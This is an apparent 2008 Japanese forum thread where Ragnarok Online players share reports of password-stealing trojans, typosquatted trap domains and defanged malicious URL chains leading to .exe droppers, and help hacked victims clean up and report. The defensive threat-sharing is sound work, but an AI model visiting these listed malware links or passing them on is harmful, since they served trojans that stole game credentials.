いまどきDTD指定もされていないレンタルBlogだし、過度の期待は出来そうも無いが。 <> （○口○*）さん<>sage<>08/07/15 11:32 ID:LSIvlcMy0<> 福建中華がここ数日ポツポツとドメイン取得を行っている模様。
Domain name: gaimima130■com

Registrant Contact:
lin ying wu
yingwu lin
fu jian sheng long yan shi
long yan FJ 364000
cn

Created: 2008-07-13
Expires: 2009-07-13

Domain name: livedoorm■com

Created: 2008-07-12
Expires: 2009-07-12

気をつけてくれよな！ <> （○口○*）さん<>sage<>08/07/15 12:09 ID:hfFxyVMr0<> livedoormってtypo狙いか
旧ライブドアマーケティングかと思った <> （○口○*）さん<>sage<>08/07/15 13:21 ID:j2EX1+oX0<> 類似名のドメインに対して、Googleの「もしかして」みたいなチェック機能が
あればなぁ。 <> （○口○*）さん<>sage<>08/07/15 19:05 ID:hWj2NXvn0<> >>371
typoに対しては、Firefox3のスマートロケーションバーが
そんな感じに働いてくれる。
インクリメンタルサーチだから補正とはちょっと違うけど。
http://mozilla.jp/firefox/features/#location-bar <> （○口○*）さん<><>08/07/15 22:47 ID:gs9xqOyc0<> 【　　　気付いた日時　　　　　】昨日
【不審なアドレスのクリックの有無　】無し
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【　　ツールの使用の有無　　　】 No
【　ネットカフェの利用の有無　　　】 No
【　　　 OS　　】ウィンドウズXP
【使用ブラウザ】 IE
【WindowsUpdateの有無】無
【　アンチウイルスソフト】 avast spybot
【その他のSecurty対策】無
【ウイルススキャン結果】 avastで発見したウィルスは削除したのですがカスペにて再検出
【スレログやテンプレを読んだか】今から読みます
【hosts変更】無　
【PeerGuardian2導入】無

昨日INすると自キャラの所持金が減っており垢ハクであることに気づきました。
とりあえず別のPCにてパスなどは変更したので大丈夫かとは思います
その後の対処として上記の通りavastや他のスキャンソフトで見つかった分の削除はしたのですが、
不安になりカスペでもチェックしたところ、
SYSTEM32のフォルダのSAMaspnet.dllというデータが感染しているということがわかりました。
さらにこのデータをavastでチェックしましたが検出されませんでした。
カスペでのスキャン結果によると、ウィルスの名前は「Backdoor.Win32.Delf.jga」
というものらしく対処に悩んでいます。
この場合どうすればいのでしょうか？よろしくおねがいします。 <> （○口○*）さん<>sage<>08/07/15 22:52 ID:iX1jVnkQ0<> 誤検出の可能性のあると思われるものはVirusTotal辺りに提出して自己判断。
カスペの検体提出窓口に出すのが一番確実。

ガンホーへの連絡と警察への届け出を平行して行ない、感染を除去したログ等の保存も忘れずに。 <> （○口○*）さん<><>08/07/15 23:23 ID:gs9xqOyc0<> >>374
レスありがとうございます
カスペの検体提出窓口というのはオンライスキャン結果の送信という項目でいいのでしょうか
あと、この書き込みは感染の疑いのあるPCで書き込んでいるのですが
ガンホーへの連絡などは別のPCのほうがいいですよね？ <> （○口○*）さん<>sage<>08/07/15 23:34 ID:iX1jVnkQ0<> >>375
>カスペの検体提出窓口というのはオンライスキャン結果の送信という項目でいいのでしょうか
セキュWikiの検体提出窓口を参照。

オンラインスキャンに送信ってあったっけかな。あればそこでもいいけど、メールで送っとけば
返事が来るので（英文だけど）、誤検出かどうかわかって安心できます。

>ガンホーへの連絡などは別のPCのほうがいいですよね？
当然です。別PCを使ってください。除去が完了した確証のないPCから、
IDとパスを入力するページを開くなんて危険な行為をやってはいけません。 <> （○口○*）さん<><>08/07/15 23:41 ID:gs9xqOyc0<> >>376
とりあえずVirusTotalを試してみましたが「Backdoor.Win32.Delf.jga」
が表記されたので確実に感染してるとおもいます。
こうなった場合、avastをアンインスコしてカスペの無料アンチウィルスで除去したほうがいいのでしょうか？ <> （○口○*）さん<>sage<>08/07/15 23:46 ID:ttphBfBH0<> OS再インスオススメ <> （○口○*）さん<><>08/07/15 23:50 ID:gs9xqOyc0<> >>378
OS再インスコした場合ROなどPASS変更済みならば
なんの問題もないと考えていいのでしょうか？
こうゆう事態になったのが初めてなので質問ばかりですいません <> （○口○*）さん<>sage<>08/07/16 00:56 ID:BpMHL5bz0<> >>379
基本的にYes。

バックアップを取ったデータの中に、トロイやダウンローダが含まれていた場合再感染の危険は残る。 <> （○口○*）さん<>sage<>08/07/16 04:59 ID:cC4/ddCf0<> Win32:Trojan-gen. {Other}が検出されましたと
うちのavast!!君が言うから調べてみたら
avast!!特有の誤検出らしいので
カスペ、バスタースキャン、Ｓ&Ｄ、でスキャンすると
きれいさっぱり何も検出されないってのは
やっぱうちのavast!!君が頭悪いだけか

何かお勧めない？
avast!!が信用できなくなりました <> （○口○*）さん<>sage<>08/07/16 05:01 ID:0ZpMF52S0<> >>378
判っていると思うが念のため。
OSを再インストールした後にPASSを変更しないとダメだぞ。 <> （○口○*）さん<>sage<>08/07/16 08:11 ID:s34t8COB0<> おすすめなんてわからんが、うちはカスペ（のサブセット）だな。 <> （○口○*）さん<>sage<>08/07/16 08:34 ID:mJioLi0l0<> >>381
うちではHTTP通信をするDLLでそれが検出される。
作者は誤検出だって言ってるし、実際そうなんだろうけど
それを悪用するアプリもあるかもしれない。
誤検出だと決め付けるのは危険だよ。 <> 373<><>08/07/16 12:22 ID:No5ZcYuUO<> 携帯から失礼します
。皆様レスありがとうございます。とりあえずOSの再インスコすることにしました。
そして、ウィルス駆除後のpassなどの変更は
RO以外のもの(mixiやニコ動など)も行った方がいいのでしょうか？ <> （○口○*）さん<>sage<>08/07/16 12:52 ID:s34t8COB0<> 何抜かれたか分からないので、考えられるモノ（＝利用したモノ）は
やっておいたら？セキュリティ向上のためにも。 <> （○口○*）さん<>sage<>08/07/16 12:53 ID:BpMHL5bz0<> >>385
感染後にパスワード入力（クッキーなどに保存していて自動ログインであっても）してから
閲覧していた場合は、パス変更がお勧めです。

いつ踏んだものかわからない場合は、自己責任で判断して下さい。

踏んだ後に、１度もログイン・閲覧を行なっていない場合、パスを変更する必要はありません。 <> （○口○*）さん<>sage<>08/07/16 15:08 ID:c339DK7H0<> >>385
パスワードローテーションの観点からは、変更することが望ましいといえる。
仮に、それら全てで共通のパスワードを用いているならば、出来れば有料と無料のサービスでは別々のパスワードを用意した方が無難。
mixiやnicovideoへの認証はメールアドレスを用いている為、安全弁がパスワードだけしか存在しないから。 <> （○口○*）さん<>sage<>08/07/17 01:23 ID:4oHDNR4H0<> OfficeのSnapshotViewerの脆弱性を使うスクリプト。
kk■jackkk■cn/office.htm
→ dd■jackkk■cn/a.exe

あまりに単純なスクリプトでお茶噴いた。 <> （○口○*）さん<>sage<>08/07/17 01:46 ID:4oHDNR4H0<> Firefox3.0.1リリース
Firefox2.0.0.16リリース <> （○口○*）さん<>sage<>08/07/17 01:57 ID:uQT56Mlz0<> 早漏乙、正式に落とせるようになってからリリースっていえな <> （○口○*）さん<>sage<>08/07/17 02:10 ID:Px5hoRsz0<> Firefox2.0.0.16はアップデートできるけど、Firefox3.0.1はまだ無理だな

たぶんFirefox3.0.1は昼頃かなー <> （○口○*）さん<>sage<>08/07/17 07:26 ID:mc2CMNTD0<> 別スレで質問させて頂いたのですが、こちらに誘導して頂きましたので
再度質問させてください。

先日垢ハクに遭い倉庫がカラになっていたのですが、
警察への報告はなくしたアイテムなども事細かに書けと言われたので
倉庫にあったと思わしきものを出来る限り書き出して提出しました。

救済措置が取られる場合、あちらにはゲーム内のログが詳細に残っていたりして
( /savechatした時みたいに〇〇1個獲得みたいな)
そういうものと照会して取られたと確認出来ればそのアイテムは戻ってくるの
でしょうか？
それとも、そんなログは残らっておらず、確認出来ないという事で戻ってはこないのでしょうか？

お分かりの方がいましたら教えて頂けませんでしょうか。よろしくお願いします。 <> （○口○*）さん<>sage<>08/07/17 09:14 ID:AcCWZO4S0<> 分からんけれど、期待はしない方がいいよ。
ゲーム内資産に金銭的価値は認められないし、窃盗罪にも問えない。 <> （○口○*）さん<>sage<>08/07/17 10:43 ID:pC/alNKM0<> 不正アクセスでタイーホはできるかもしれないけど戻ってくるとは限らないって事かな？ <> （○口○*）さん<>sage<>08/07/17 11:31 ID:uQT56Mlz0<> 逮捕こそ出来んよ… <> （○口○*）さん<>sage<>08/07/17 11:56 ID:eQggwgXq0<> >>ゲーム内資産に金銭的価値は認められないし、窃盗罪にも問えない。
裁判の実績的には存在するはず、もちろんその逆で <> （○口○*）さん<>sage<>08/07/17 12:02 ID:Y4VrHlMP0<> >>397
それは課金アイテムに関してだろ。現実の金と結び付きが実証できるものに関しては別。
ただの電子データに関しては、価値を保証する法律は整備されてない。 <> （○口○*）さん<>sage<>08/07/17 12:17 ID:uQT56Mlz0<> とりあえず話ずれてきてるからここいらで終わっとこうぜ <> （○口○*）さん<>sage<>08/07/17 12:19 ID:Y4VrHlMP0<> だな。 <> （○口○*）さん<>sage<>08/07/17 13:14 ID:AcCWZO4S0<> >>395
そこまでやるかは運営次第で、やってくれなかったら民事訴訟しか
ないんだけれど、こちらもそこまでやるかって話なのだ。 <> （○口○*）さん<>sage<>08/07/17 15:19 ID:pC/alNKM0<> そもそも大半の実行犯は中華でしょっぴけなさそうだしな <> 393<>sage<>08/07/17 15:35 ID:mc2CMNTD0<> 皆さんレスありがとうございます。
戻ってこないものと認識していた方がよさそうですね。
また一からやり直すつもりでがんばります。 <> （○口○*）さん<>sage<>08/07/17 15:48 ID:pC/alNKM0<> 可能性はゼロじゃないし、経路もわかるかもしれないから（再発防止）
できる範囲でアクション起こしたほうがいいかも <> （○口○*）さん<>sage<>08/07/17 16:10 ID:QbGsqOjA0<> 金銭的価値があるかとか逮捕できるかとかでベクトルがずれて
393の質問に答えてないじゃないか。
>>2の臨時まとめさんに救済された例がまとめてある。
泣き寝入りせずにがんばれ。 <> （○口○*）さん<>sage<>08/07/17 16:42 ID:uhxp2RPA0<> 11ヶ月前にハックされた者なのですが、ようやく警察から連絡が。
心配なのは11ヶ月前となると当時のデータは残っていなくて復旧は不可能なのではないかということ。
データが復旧された方の体験記を読むと、たいてい半年以内なんですが、半年以上経っても復旧された例をご存知の方いらっしゃいますか？ <> （○口○*）さん<>sage<>08/07/17 18:15 ID:TrUySGeX0<> >>369の罠ドメイン、livedoormにトロイが置かれた。
中国のフォーラムに福建中華：cvooe自らがリネ向けトロイとして記事を書いている模様。
livedoormでぐぐるとcvooeの記事とそのフォーラムが見つかる。

拾ってきたものをVirSCAN.orgにかけてみると…。(魚拓)
ttp://s01.megalodon.jp/2008-0717-1809-02/www.virscan.org/report/8c1bb83dcbed0efad4a2935ff206231a.html

気をつけてくれよな！ <> （○口○*）さん<>sage<>08/07/17 18:44 ID:pC/alNKM0<> >>406
癌次第？ <> （○口○*）さん<>sage<>08/07/17 19:52 ID:7KPS2oLg0<> 癌に報告すれば分かると思うけど。
不正アクセス禁止法の被害にあったという証拠があればデータ復旧してくれるとの事。

-----------
ゲームデータの復旧に関しては
警察機関による捜査が完了した時点にておこなっております。

ご投稿いただきました件につきまして、ご相談いただきました
警察機関にて現在も捜査中であるため、
ゲームデータの復旧をおこなうことができません。
何とぞご了承いただきますようお願いいたします。

なお、アカウントハッキングであるという事実が確認され、
捜査が完了した際には、再度運営チームまで
ご連絡いただきますようお願いいたします。
-----------

俺も今調査中で早く調査が終わらないかとwktkしているんだ。 <> （○口○*）さん<>sage<>08/07/17 21:15 ID:uhxp2RPA0<> >>409
問題なのは、11ヶ月も前のデータを保存しているんですかね・・・。
不正アクセスがあったという事実は突き止めたものの、さすがに11ヶ月前のデータを復元出来るかどうか。 <> （○口○*）さん<>sage<>08/07/17 21:33 ID:JyxGbJQL0<> >>410
データ復旧に警察判断が必要でも、復旧に必要なバックアップの保全を
すること自体は警察が動く前でも可能なわけで、おまえさんが
11ヶ月前にちゃんと癌へ働きかけをしたなら残ってる可能性はある。

ただ正直なところ、なんで11ヶ月も経った今になって警察が動くのかが
わからないとなんとも言えない。
前例作る意義もあるからがんばれ。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/07/18 04:42 ID:el2S9DQV0<> 最近罠サイトの転送先が数時間後には
別の所に置き換わっているということが頻繁？にあるようです。
もちろん前から危険ドメインが停止扱いになったりで
使えなくなったので切り替えたというのはよくある話だと思うのですが…

お世話になっているFFXI(仮)さんのサイトの階層分析
52-o■cn/admin■js
+www■pang357■cn/e2■htm
　+user1■web285■com■cn/news■html

数時間後-------
52-o■cn/admin■js
+www■pang357■cn/e2■htm
+www■pang951■cn/ghost■html

で、たまたまさっきチェックしたときに下の357が切り替わってた。
www■pang357■cn/e2■htm
+js■users■51■la/1937313■js
+www■sony123■com■cn/ghost■html

pang357に切り替わったのはpang951が使えなくなって差し替えたわけでなく
pang951自体は現存している模様。
時間単位で罠サイトの内容を書き換えるようなプログラムでも使ってる…？
とか妄想してみたけど実際どうなんでしょうね。

とりあえず罠サイトの中の人必死だなって思う。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/07/18 04:47 ID:el2S9DQV0<> 半角スペースが削れてた…。全角スペースでないと駄目なんですね。
二段目は
52-o
+357
　+951
です。スレ消費ですみません。 <> （○口○*）さん<>sage<>08/07/18 17:30 ID:Ua1mdD9g0<> トロイの木馬を踏み台にしたSQLインジェクション攻撃が増加
ttp://internet.watch.impress.co.jp/cda/news/2008/07/18/20313.html
>　この攻撃は、ユーザーのPCに仕掛けたトロイの木馬「TROJ_ASPROX」をプロキシサーバーとして利用することで、
>Webアプリケーションを標的としたSQLインジェクション攻撃を行い、不正なWebサイトへのアクセスを誘導するIFRAMEタグを埋め込むというもの。

この間のPangYa公式改竄もこの類いかも知れないが、botnet的な使われ方が再び活発になってきた。
被害者が、次の瞬間には加害者に転じてしまう。

セキュリティソフトの検疫のように、感染ユーザーの接続を一時的にISPから切り離す仕組みが必要かも。
接続先はフレッツ・スクエアのような隔離ネットワークに限定され、その中にDMZの要領でWUやセキュリティソフトへのサポートを行う感じ。 <> （○口○*）さん<>sage<>08/07/18 18:07 ID:kMs8Yetr0<> >>414
そういうのあればいいねえ。
それを妨害するマルウェアも出てくるでしょうが。

とりあえず、外部からの接続を防ぐためのルーターは挟めておきたい。 <> （○口○*）さん<>sage<>08/07/18 20:55 ID:4ScR5NOj0<> >>412
adw95系( >>414 asprox)みたいな動的切り替えは
やってない気がします。たぶんアナクロな手法でしこしこと。 <> （○口○*）さん<>sage<>08/07/19 19:41 ID:8Dh2MRq20<> blog■livedoor■jp/fvidkl/
-> www■livedoorm■com/woodem■htm
--> www■gaimima130■com/2■exe

ttp://www.virustotal.com/jp/analisis/068e581692007413e16f33c2fe63f6d5

livedoormも稼働し始めたね。
折角なので、typo狙いのかどでlivedoorにドメインごと通報してみた。 <> （○口○*）さん<>sage<>08/07/19 23:06 ID:GNjT+H010<> >>417
woodem.htmはカスペスルー。

http://www.virustotal.com/analisis/664edfad076b999bd50ac24fdbefce7e

woodem.htm : Exploit:HTML/MS06014 , JS/MS06-014!exploit , JS/AdoExpl.A!Camelot
2.exe : Backdoor.Win32.PcClient.gbc <> （○口○*）さん<>sage<>08/07/20 09:45 ID:PzxOPE480<> 情報提供です。

http://www■testinghua■com/Wiki/ragnarok/v=UIb2Jdte1jU■zip

mixiのRO関連コミュニティに、上記アドレスを書き込んだ不審なトピを立てまくってる奴がいる模様です。
（BS Wikiの危険ドメインと一致していたので危険と判断、運営事務局には通報済み）
mixiでRO関連の活動をされている方はご注意ください。 <> （○口○*）さん<>sage<>08/07/20 10:25 ID:3a2ScYx40<> kovieによる日本サイト攻撃も確認。
kovieをGoogleの日本語ページで検索すると、ネカフェの掲示板にその痕跡あり。
これもまたテンプレ文、末尾にウィルスと。
【検索結果2ページ目】
1 kovie さん 08/07/19 20:41 UID：[ 60886@FJFCF ] [ 返信 / 引用 ] [ 終了 / 編集 / 削除 ].
世界最強のエロ動画データベース 8万タイトル以上 ★yourfilehostからダウンロードできます！★
hxxp://www■livedoorm■com/blog■htm ...

気をつけてくれよな！ <> （○口○*）さん<>sage<>08/07/21 11:51 ID:C8xeomJa0<> 【　　　気付いた日時　　　　　】 7月20日午前8時
【不審なアドレスのクリックの有無　】 (？)
【他人にID/Passを教えた事の有無】 (No)
【他人が貴方のPCを使う可能性の有無】 (No)
【　　ツールの使用の有無　　　】 (No)
【　ネットカフェの利用の有無　　　】 (No)
【　　　 OS　　】 (XP　HomeEdition SP2)
【使用ブラウザ】 (スレイプニール)
【WindowsUpdateの有無】 (今年6月末か7月頭くらい)
【　アンチウイルスソフト】 (？)
【その他のSecurty対策】 (？)
【ウイルススキャン結果】 (カスペルスキースキャンでトロイ発見)
【スレログやテンプレを読んだか】 (軽く目を通した)
【hosts変更】(？)
【PeerGuardian2導入】(？)
【説明】倉庫の装備とメインキャラの装備資金が根こそぎ消えていました

カスペルスキーでトロイを発見、削除したのですが
この状態でROのアカウント設定を変える等の行動は起こすのは安全でしょうか
またプロダクトリカバリーの効果はいかほどでしょうか <> （○口○*）さん<>sage<>08/07/21 11:59 ID:OVYH0V1I0<> シマンテック、「ノートン2009」日本語ベータ版を無償公開
http://internet.watch.impress.co.jp/cda/news/2008/07/18/20308.html

パターンの反応が速ければなぁ… <> （○口○*）さん<>sage<>08/07/21 12:02 ID:OVYH0V1I0<> >>421
>【説明】倉庫の装備とメインキャラの装備資金が根こそぎ消えていました
垢ハックなむ

>カスペルスキーでトロイを発見、削除したのですが
>この状態でROのアカウント設定を変える等の行動は起こすのは安全でしょうか
他に何かが残っている可能性もある。安全と保証はできない。
設定を変えるのであれば、安全な環境を用意する（1CD linuxなど）ことを推奨する。

>またプロダクトリカバリーの効果はいかほどでしょうか
リカバリー＝安全な環境

それより、（もう取られるもの無いんだし）癌と警察への報告を早急に行なえ！ <> 421<>sage<>08/07/21 14:14 ID:C8xeomJa0<> 幸運なことに被害は資産の1割程で済みました
そのため（まだ捕られるものがあるため）癌へのログインができない状況です

データのバックアップを取りプロダクトリカバリーを行い
各種再設定を行いたいと思います

423さんありがとうございました <> （○口○*）さん<>sage<>08/07/21 16:52 ID:OVYH0V1I0<> LiveROに立ったアカハックスレ

｜1 （○口○*）さん 08/07/21 16:43 ID:glsBfpkZ0
｜今週は遊びで同盟内紅白戦をやってました。　いつもたいていWP付近でロキだけだったので、たまにはエンペ付近に行くのもいいですね。
｜
｜http://www■game689■com/rmvb■exe

Trojan-PSW.Win32.Mapler.ae

http://www.virustotal.com/analisis/b30a2d2f054ca67f1fc4098050913783 <> （○口○*）さん<>sage<>08/07/21 16:53 ID:OVYH0V1I0<> >>424
1CD Linuxとかで早急にパス変えとけ。さもないとリカバリ作業してる間に残りももっていかれるかもしれないぞ。 <> （○口○*）さん<>sage<>08/07/21 17:31 ID:OVYH0V1I0<> >>425
｜4 L ★ sage New! 08/07/21 16:51 ID:???0
｜OFSfb-18p2-25*.ppp11.odn.ad.jp
｜
｜7 L ★ sage 08/07/21 16:55 ID:???0
｜2時間後スレを削除します。 <> （○口○*）さん<>sage<>08/07/21 18:00 ID:7Nju+0tN0<> >>425
Maplerか…これの原種はMapleStoryトロイっぽいね <> （○口○*）さん<>sage<>08/07/21 18:03 ID:rTxpfCM00<> またOFSｵﾃﾞﾝか

そのホストは無条件に永久アク禁でも誰も困らないだろ <> （○口○*）さん<>sage<>08/07/21 18:51 ID:+DpP3igH0<> ODNの当該は、2chでも5度くらいの再発規制を繰り返して呆れられているし、ROでも職Wiki方面では既に見放されているよ。
所詮は禿テレコムだし、巻き込まれ被害者はISPを乗り換えた方が賢明。 <> （○口○*）さん<>sage<>08/07/21 22:12 ID:rBFKhVFe0<> さきほど、カスペルスキーオンラインで検出をかけたら
午後のこーだのインストーラーにトロイの検出がでました。検体名は
「Trojan-Dropper.Win32.Agent.uhz 」
ウイルス辞典などにも記述はのってなく、どんなものなのか詳細は不明
カスペスレでは、誤検出として取り扱われていました。
で、そのあとインストーラーを削除したんですが、カスペで再び検出すると以下のものが

C:\System Volume Information\_restore{82D310DE-1BB8-4FF6-A3EA-FE19A694DC23}\RP32\A0008840.exe/compile/bin/nasmw.exe
C:\System Volume Information\_restore{82D310DE-1BB8-4FF6-A3EA-FE19A694DC23}\RP32\A0008840.exe
C:\System Volume Information\_restore{82D310DE-1BB8-4FF6-A3EA-FE19A694DC23}\RP32\A0008841.exe/compile/bin/nasmw.exe
C:\System Volume Information\_restore{82D310DE-1BB8-4FF6-A3EA-FE19A694DC23}\RP32\A0008841.exe

おそらくシステムの復元ポイントで作られたコーダのインストーラに反応してるっぽいのですが、
詳細がよくわかりません。どなたかわかる方ご教授いただければと思います。
よろしくお願いします。 <> （○口○*）さん<>sage<>08/07/21 22:40 ID:OVYH0V1I0<> >>431
nasmw.exeを検知してるようですね。（インストーラ付きだと、コンパイルする為に内蔵してる）
このTrojan-Dropper.Win32.Agent.uhzは、誤検出と思われますので、カスペに検体提出しときます。 <> （○口○*）さん<>sage<>08/07/21 22:53 ID:OVYH0V1I0<> >>431
検体提出しつつ、パターン更新したら検出しなくなっていました。（カスペの担当者さん、よけいな仕事増やしてごめん）
定義の更新をお勧めします。 <> （○口○*）さん<>sage<>08/07/22 10:20 ID:mOjk87L/0<> >>433
GJすぎる <> （○口○*）さん<>sage<>08/07/22 12:57 ID:RX31tSpu0<> 仕事はやいんだなｗ <> （○口○*）さん<>sage<>08/07/22 13:24 ID:u6jw3w4Q0<> 福建中華の罠したらば誕生。

"Ragnarok Fenrir板"
ttp://jbbs■livedoor■jp/computer/39711/

見ておかしいと直ぐに気づくはず。
スレが2つのみ、それぞれ記事数は1しかないうえ、一つはハック。
こういうタイプだとライブドアなかなか動かないんだよなぁ。

気をつけてくれよな！ <> （○口○*）さん<>sage<>08/07/22 13:57 ID:u6jw3w4Q0<> 436のやつ過去スレにも出てるのか、2月ごろに
でも今のとは状況が異なるね。
過去スレで2／16ー18にあったという管理者投稿が綺麗に消えている、今現在の投稿は7／20ー21の2つだけだ。
時々で中身を入れ替えるタイプだと思われ。
よって”computer/39711/”はNGワードでも構わないと思う。 <> （○口○*）さん<>sage<>08/07/22 13:59 ID:XIhY5BsQ0<> できることは何でもやっちゃう、か。
人件費がタダみたいな国は、人間を奴隷のように働かせるんだからすごいや。 <> （○口○*）さん<><>08/07/22 19:42 ID:hciaLu7X0<> 今更だが復旧の体験談とか需要ある？ <> （○口○*）さん<>sage<>08/07/22 19:44 ID:VpRunD6K0<> こっちだとログ残らないから（保存してるサイトなら別）
長くなるようならまとめサイトを立ててくれると嬉しいかもしれない <> （○口○*）さん<>sage<>08/07/22 20:26 ID:zmgt25Ms0<> >>439
投下希望

>>440
それこそ、Wikiかまとめサイトに転記すれば済む話。 <> （○口○*）さん<>sage<>08/07/22 20:31 ID:Qk1NLe2k0<> そうそう。

せっかく書いてくれるんだから、形態は問わないよ。
必要に応じてまとめたり転載したりはさせてもらうけど。 <> 431<>sage<>08/07/22 23:24 ID:fb7q4MCh0<> >>433
うは、対応までしてくださったみたいでありがとうございます。
ご迷惑おかけしました <> （○口○*）さん<>sage<>08/07/23 00:09 ID:xazTC+tH0<> CNETより

通信傍受するARPスプーフィングによる被害が増加--アンラボがレポート
ttp://japan.cnet.com/marketing/story/0,3800080523,20377488,00.htm

>6月のトップ10にランクインした悪性コードを見ると、4月や5月に大部分を
>占めていたオンラインゲーム関連のトロイの木馬が、7位と9位に登場した
>のみとなった。
>悪性コード製作者の関心が、単純にオンラインゲーム関連のトロイの木馬を
>制作することから、ドロッパーやダウンローダーなどを利用したオンラインゲーム
>関連のトロイの木馬の配布に移っているためであると分析している。

>このようなARPスプーフィング攻撃も、オンラインゲーム関連のトロイの木馬を
>インストールすることが最終的な目的になっているタイプがほとんど。 <> （○口○*）さん<>sage<>08/07/23 00:12 ID:xazTC+tH0<> もう１つCNETより。
こっちの方が問題……

オーディオファイルに感染する初のワーム、カスペルスキーが検知
ttp://japan.cnet.com/news/sec/story/0,2000056024,20377521,00.htm

>しかし、今回のワームはオーディオファイルそのものに感染しており、
>Kaspersky Labのウイルスアナリストによると前例がないという。

>Kaspersky Labでは、ユーザーのほとんどは自分のオーディオファイルが
>感染するとは考えていないため、攻撃が成功する可能性は高いと予測している。
>また、偽ウェブページ上のファイルにはInter Technologies社の電子署名が
>付与されており、www.usertrust.comによって信頼できるページと認められて
>いることに注目している。 <> （○口○*）さん<>sage<>08/07/23 00:18 ID:vFuDhpDF0<> なんかウイルスというより、いつものようにファイル形式決めうちの処理を
しているのが原因っぽい感じが

メディアプレーヤー以外で再生した場合は何も起きないんじゃないかな？ <> （○口○*）さん<>sage<>08/07/23 00:24 ID:fuIAFJC30<> >>445
カスペも同じニュースを自サイトで出してますね。

Kaspersky Lab、オーディオファイルに感染する新種ワームを検知
http://www.kaspersky.co.jp/news?id=207578680

MP3ファイルに取り付いて、拡張子そのままで、WMA形式に変換し、トロイとして動作させるらしい。
一種の拡張子偽装だねぇ。 <> 439<><>08/07/23 03:49 ID:tGUdEoZn0<> >>440　>>441　>>442

>>439です
すみませんが
まだ約束を取り付けたところまでだけなんで完全に復旧完了したら投下します <> （○口○*）さん<>sage<>08/07/23 04:31 ID:XePG6JRI0<> >>436 のやつ行ってみた。
スレ一個しか無かった。
ハックのは無かったみたい。 <> （○口○*）さん<>sage<>08/07/23 10:12 ID:j70Rni8v0<> >>449
一応したらばタイプの正式な削除依頼出しておいたからな。

>ハックのは無かったみたい。
やはり完全に中華の板と化している模様だな。
中華は自分の板に他人に書き込みされるとスレごと消すぞ。
中華が自分で消したな、次に罠書くときは自分で書いたら即1文字規制になっているはず。
1文字でも文字数が多すぎますってやつだ。
以前の罠カキコなんかもそうだった。

他所で書いたが436のしたらばの6月時点のキャッシュと今のは掲示板スタイルも違うのでひょっとすると、と言う不安もある。
掲示板タイトル部分、どうみても2ちゃんの○○板のところのパクリ

キャッシュのは透明削除せずちゃんと警告の上削除していた事を考えると6月時点の管理者がやったものとは考えにくい。
つまり…。

気をつけてくれよな！ <> （○口○*）さん<>sage<>08/07/23 11:40 ID:j70Rni8v0<> >>436に続いておかしなものを見つけた。
ttp://jbbs.livedoor.jp/computer/27417/
スレの流れからこの板は2006年1月ごろに作られた"仮面ライダーもの"の掲示板であるようだ。

なのにタイトルは"Ragnarok...."
436と同様に2ちゃんの○○板のところをパクっている。

明らかに不自然、直接リンクじゃないのが救いだが
やはりこれは…、と勘ぐりたくもなる。 <> （○口○*）さん<>sage<>08/07/23 14:36 ID:fuIAFJC30<> >>451
見てみた…すげーな。

明らかなアカハックと、アダルト業者のspamだらけだｗ <> （○口○*）さん<>sage<>08/07/23 15:40 ID:31CZ2k+10<> DNS脆弱性の詳報が手違いで流出
http://www.itmedia.co.jp/news/articles/0807/23/news031.html

ま、まあ…気をつけてね。 <> （○口○*）さん<>sage<>08/07/23 23:22 ID:N8tZpIH3O<> 今日ネカフェ○○空間行って、経験値ｳﾏｰしながら
バック作業でカスペってたんだが、帰る時結果見たら１件…。

Backdoor.Win32.Rbot.rdxと表示されてました。
自宅帰ったら即パス変更するつもりでしたので
そこまで焦りはないですがやはりカスペで何か引っ掛かると驚きますね。

ネカフェは怖い(´･ω･`) <> （○口○*）さん<>sage<>08/07/23 23:42 ID:xazTC+tH0<> 当然、店員にはそれ伝えたんだよな？

>自宅帰ったら即パス変更するつもりでしたので
>そこまで焦りはないですがやはりカスペで何か引っ掛かると驚きますね。

過去にハク犯とリアルタイムでログイン合戦をやった人も居る。
ネカフェ出てから自宅までどれぐらい掛かるか知らんが、その時間が
致命傷になる場合もありえるわけで、もうちょっと焦った方がいいと思う。

しかしバックドアが仕込まれてるネカフェってどうなのよ…… <> （○口○*）さん<>sage<>08/07/24 00:18 ID:bYDtp8fZ0<> ネットカフェが流行りだした昔は良くあったと思うけど <> 454<>sage<>08/07/24 01:04 ID:SS3h/Z7jO<> クリーンなPCよりパス変更完了！
結果はセーフでしたが、まさかバックドア？がやばいもんとは(´･ω･`)

ネカフェでググっても英語サイト２件しかひっかからなかったしで
安心しきってました。

店員には言わないですぐ退店しちゃいましたよ。

バックドアとはやばいんですかね？ <> （○口○*）さん<>sage<>08/07/24 01:12 ID:B0zmNM5O0<> やばいです <> （○口○*）さん<>sage<>08/07/24 02:22 ID:s7PDxOBi0<> >>454,457
多分このタイプ、ないしは亜種だと思われ。
ttp://www.f-secure.co.jp/v-descs/v-descs3/rbot.htm

IRCbot系バックドアが仕込まれている時点で、そのPCでの操作内容は悪意ある第三者に筒抜けだと思ったほうが良い。
できる事なら、FC本部宛にクレームを投げたほうが良い。レシートに利用席番が残っていれば、それも添えれば確実。
ttp://www.runsystem.co.jp/inqu-etc.html <> （○口○*）さん<>sage<>08/07/24 02:30 ID:5uHfnZ+50<> >>457
チェーン店なら本社にクレーム入れとけ。
もし故意なら悪質だからな。 <> （○口○*）さん<>sage<>08/07/24 02:31 ID:SS3h/Z7jO<> (´･ω･`)ひどい店に行ってしまった。

会社から近いから寄ったのにもう２度と行かないよ。

クレーム送れば何か詫び来ますかね？席番は覚えてます。 <> （○口○*）さん<>sage<>08/07/24 02:44 ID:B0zmNM5O0<> 詫びのチケットとか期待してるんなら諦めろ。

だが、次に使う奴の安全の為、次に自分が使う時の安全の為、報告だけは出しておけ。
放置する事は、不特定多数が、意図せぬ加害者になることを見過ごしてることになる。 <> （○口○*）さん<>sage<>08/07/24 02:47 ID:ZsjZu1UJ0<> とりあえずどこか明記しておいても問題ないんじゃない？店名 <> （○口○*）さん<>sage<>08/07/24 02:59 ID:SS3h/Z7jO<> 時遊空間です

本社にクレーム入れておきますね <> （○口○*）さん<>sage<>08/07/24 08:02 ID:iMnQezdY0<> それは会社名な
店名てのは○○店、ってほう <> （○口○*）さん<>sage<>08/07/24 09:34 ID:xsjPWWsL0<> あそこ危ないのかよ…
今度から最低でもカスペオンラインスキャンかけてから使った方がいいね <> （○口○*）さん<>sage<>08/07/24 09:42 ID:HlFsIU5F0<> ネカフェはスキャンしてから使うのが常識だろ・・・・。
